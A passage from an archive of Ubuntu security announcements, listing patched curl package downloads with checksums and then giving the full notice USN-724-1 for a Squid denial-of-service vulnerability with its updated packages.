      Size/MD5:   717326 74244221991d13b3e27d7600b25cc667
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   167960 0d960ee5cb9c386af7730dd6985e519e
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   724246 a35139c3af268cb40a64b2d4562c239e
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   172910 33529da99980d7c599c1ddbf49a7a298

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   168448 3ff82ec8fbffb489c198ef86ad45155b
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   506770 10c355570dcb3812efa661f3359792fa
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   700624 d9ed3ac37839ed446dd2d19f4c0ccac1
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   160502 7325d0cd0802f12340de1e5ff8fc94ad
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   705276 442b603f3bef1bb6b76cb475108d0869
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   165456 52191a45a9ccfb55dfa95a5d6059c4c4

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   172084 3b8d50cd83bce1fbf4db132ac6b5fcf2
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   542256 f038486866f70fd91641a338684c9fd7
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   723702 ab81371909385b48de743ff8c6bdef1e
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   170316 b131cc76e2315a6969e5d842ee00ac7d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   729156 ecb7523175cc86845a65a45e584c52f4
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   174808 75929f5b8f8665d595d71b1477428fe8

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   169262 d1227121940771c773000adf86cb2b25
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   510838 cedeacff8c06c39c973cb49e14098a72
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   710240 a69b147b9aa4e84755128b20cf8d6cc0
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   163088 2dc3c7c08147eb59e3b10df00a84380d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   714840 ef9596a90e8f5d3872dbb533c2e3a785
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   167244 0eb1ef9b9f24c1ce216bfac5ac61a770

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1.diff.gz
      Size/MD5:    23038 ec29fe4a6ce15381ee4d18977a01cf54
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1.dsc
      Size/MD5:     1070 ee6f69c49d16d34809984d41ba9a95d9
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4.orig.tar.gz
      Size/MD5:  2127522 b8f272cfe98fd5570447469e2faea844

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   175802 1031a8edbe06cac94c392dedc7453fe5
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:  1030904 97008fb6866a84bfc1bfc6aadc387c37
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   180212 8879fd596ec6d374ecc3db7c590a4dee
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   186854 216542e4ee0aa37b12dfceb9f782431f
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   828040 3bef020322ca21c8673b55bcde5a7555
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   835418 03a845d4637949826e4b606675643351

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   174936 a69d59cba07ca9611470fa45c441d41f
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   998270 4adafc7307dec5a9194e53d27046862a
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   176140 63ce96a012b6b57e14ada06f633293f8
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   182128 cc373dd8b1383abc9647b2755dcc82c2
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   802764 b4f2f06c793123ffc85ecd754d27a799
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   808706 4cdc8ddd315dbd125b6dd6fd9254f584

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   174826 826bd0dc3bab6c9df46b737c99a4cc12
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:  1016026 54999bbac5f7b80c03a450d0fa782e2c
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   174294 4b881eab13f96f101f233b8d8066a1eb
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   180832 7e9738237d5a15b0117463d9c9067925
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   800482 8f79859acd3d9c5656c8776bd595aa17
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   806612 d310180304c4688ad36b734a929514aa

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   179486 e0fb5643133b30cc3e258820cf17d67d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:  1045612 845b188923e649bc8a165b8356e7f406
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   187794 cd8cd13657a67c0367bae7c821075cbb
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   193612 d4178d220ba2d1e12005387e9226a27b
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   826054 ce04418fbb88124acc4705e9372ecd30
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   831906 3a8efee4daf4b2ca73165bd2ec1e2883

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   175644 6b184238aa16330227fa2ef555b6e558
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   990958 66b0b3669cba60f631ed6a0a24617188
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   174762 e8750cc8896cfcffce4815777ac3caee
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   179512 c0e79f63b732fbbc405652f107878b84
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   808072 684fb0a815911676557b5debd393a1fe
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   814506 1aa48c17a5be7a7373b045abfc18da3d

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1.diff.gz
      Size/MD5:    23694 d86f917e0253ba822db6d2424798463c
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1.dsc
      Size/MD5:     1101 1a3e33be24181c7ffc8f7b60816e249d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0.orig.tar.gz
      Size/MD5:  2285430 76ff5a7fa2e00b25ded5302885d4c3e2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   197866 101c380ab9d9ab90cd8eb29feb9b1afc
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:  1054384 bc98cdd6d1571106757d2411ad6ffd3c
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   202642 f663841bc8e03556b2d41ef1d7260930
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   209456 e8acd7503ad26b01aae5375b90178a48
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   896296 fd68ba64689210d59e867787ba4abb20
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   904552 7644776a5d3a3b1922a3507a37ec05dc

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   197074 00eb30ecbc6793f1d10bed5c8bbf5bf5
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:  1039734 541d32169bfe1529dd2d4745a1226eb1
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   198480 b4ca187d0408dc35836646c5f966bf90
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   205782 c61cf64efc7baa7cb37a03bed19cfa6a
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   870314 7e275b66161a6cf9c32fbdc4750805eb
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   877390 b8889ec5febb2da66b0dae49295e6844

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   196994 f85f088f37ed84c756fd75a5ba9c1829
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:  1046972 f93a0314315ca010c1e000d6094b529e
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   197474 bedb0ae75d50745d9070d598a7f3bbed
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   204090 7db96e2a1af5229b5c05fe332c30f756
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   869990 16be192ab09c1ca78a48d50b599b6868
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   876092 896c0bbc2eee392cbac4a18b5996931b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   201932 c3f6e455e85ddc6e69daf3431ea58e74
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:  1063946 a5d52c748048bf586cedb02daf29fb7a
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   210994 5602b8c0c9979c0eba7eff319d5bc77e
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   216006 8d65ea79097e0e635f75382d7aaecf6b
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   895512 ef52c8d4b5a097751646d1174bca4c35
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   902650 dd88be6fee4e0382db0af0cc490877b0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   197586 db78b2c9b6402e0f9ed9cb9bf7cd4872
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:  1027024 0ead1406330f62ff04c0177d185a53a9
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   196652 3e829cf092deb68935946eccb4471663
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   202218 ba4d43feba5bc66630d46766f1ae5dd3
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   877208 20b30bf93d62e6c2c165ee6be374435f
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   883238 66b2bc1ab0da39b981e35aaf694e6b67

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1.diff.gz
      Size/MD5:    22211 6e74e8584ae7aebb6c14d3a114796454
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1.dsc
      Size/MD5:     1491 9b355d2d245a85cbca121726652e7f8d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2.orig.tar.gz
      Size/MD5:  2273077 4fe99398a64a34613c9db7bd61bf6e3c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   210246 d67a5eb49a6f5e427bd1654007f455a7
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:  1124684 57f1830f3a2e4ffdec0180717f3191a0
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   216106 e36ff6ee975146c248c293ce0f8cfc6b
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   223206 56e2f570c4c989bca172cfc09a370d39
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   926082 5cc5411540ce23be3354b1f4d5fc041f
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   933036 adcb522fbbb4f3ab68b4fa8af804d5b7

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   209080 80b442fba7924160f234f6d2fc5be8ea
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:  1091876 d294a4ad45febe82279359741d6958c4
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   212550 7c5a86d097564f4563cd4992c65544a9
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   219490 83026954c17912ed54036e2f81118310
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   899576 bb001dda2e0e9def2d08f99497adfbcd
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   905326 74ff52579922240c1a034c0f223b1a1a

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   208732 cdc604e918825dd8ca06fb07b69d90ba
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:  1099032 5e1a71fa663f6f21944bf7078c57aebe
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   210790 2486bf054d91bf5e5cd32fae20d2002a
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   217316 32814e9da3f6ea13b6b2a77e872f92fc
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   898464 3028bc84dcbc05a2a65d50f49f0ed2f0
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   903772 00495fb44aba7d390ddb7643de104fca

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   212494 c0ad35c9fbaa7afeb9247b948bf3720e
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:  1130288 8a65d0227f3697b505e4634cff6831fd
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   223618 b5d5085350540d988abc19c5dcb04ea6
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   229464 8053abc5beb65a37ea489eeec41ab2c2
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   925362 8277d9fb3b898cf90e4fa46ffcf71147
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   931700 13f3edf118024e221d7f45abd05c0e7e

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   209542 6478e46bb2850c50f7b4def0d86b730b
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:  1072458 5eaf45a5c000a1f8b0d09bbab983b8ae
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   209228 83c8fcd128286fd77d9983fff53d9563
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   213982 bf031afa898326f814e2dea63fdc0523
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   904780 f3ac8d6aab6a12a4b8462152e38463a9
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   909856 c991e46b6bb3a47c79e7615f398de261



Date: Thu, 26 Feb 2009 06:28:55 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Subject: [USN-724-1] Squid vulnerability


===========================================================
Ubuntu Security Notice USN-724-1          February 25, 2009
squid vulnerability
CVE-2009-0478
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  squid                           2.7.STABLE3-1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Joshua Morin, Mikko Varpiola and Jukka Taimisto discovered that Squid did
not properly validate the HTTP version when processing requests. A remote
attacker could exploit this to cause a denial of service (assertion failure).


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1.diff.gz
      Size/MD5:   303042 9132293f589a71ae3f771e1ae6de30f1
    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1.dsc
      Size/MD5:     1252 6953f88d6f4825daabd9e77bd0fa1a88
    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3.orig.tar.gz
      Size/MD5:  1782040 a4d7608696e2b617aa5853c7d23e25b0

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid-common_2.7.STABLE3-1ubuntu2.1_all.deb
      Size/MD5:   495876 b6d1e76b140c792297c14382a06ed3e3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_amd64.deb
      Size/MD5:   771610 7f2ca95b0497cc23f0bf26b7a6503cc7
    http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_amd64.deb
      Size/MD5:   119880 27ff06a902debe143acb7b3959fb1c52

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_i386.deb
      Size/MD5:   695708 312c710ebdb46e3017b02cb672d14524
    http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_i386.deb
      Size/MD5:   118638 f2f2f698523d49d8971c7a22faebc427

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_lpia.deb
      Size/MD5:   694080 6720b3aca93aabb7600a1a2c2f699af5
    http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_lpia.deb
      Size/MD5:   118550 7484981bd7c4c8b6361362e98d5d1631

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_powerpc.deb
      Size/MD5:   777958 b9d530e92ad4638fb8d169ef55eb33f4
    http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_powerpc.deb
      Size/MD5:   120446 9899cd403bbca3e0e6f5a936cd2d9955

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_sparc.deb
      Size/MD5:   719088 2781d6fd1c7adc0b76aa12670ac1abb5
    http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_sparc.deb
      Size/MD5:   119398 8a26b4da728c31d7bd116666191575b2




